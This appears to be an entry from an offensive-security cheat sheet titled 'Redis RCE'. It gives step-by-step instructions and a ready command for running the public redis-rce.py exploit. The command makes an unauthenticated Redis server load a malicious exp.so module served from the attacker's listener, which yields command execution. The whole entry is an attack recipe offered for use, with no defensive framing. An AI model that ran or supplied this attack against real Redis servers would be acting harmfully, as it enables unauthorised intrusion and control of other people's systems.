← Back to search

Redis RCE

exploitationtool

Summary

Achieves remote code execution on an exposed Redis server by loading a malicious module (.so) via a public exploit.

Walkthrough

Use this against an unauthenticated or weakly protected Redis instance to gain command execution by loading a malicious module.

Steps

  • Build or obtain the malicious module exp.so (see the RedisModules-ExecuteCommand reference).
  • Run redis-rce.py pointing -r at the target Redis host and -L at your listener IP.
  • -p 6379 is the target Redis port; -P 6666 is the local port the exploit serves the module from.

Commands

bash

python redis-rce.py -r <IP> -L <IP> -P 6666 -p 6379 -f exp.so

References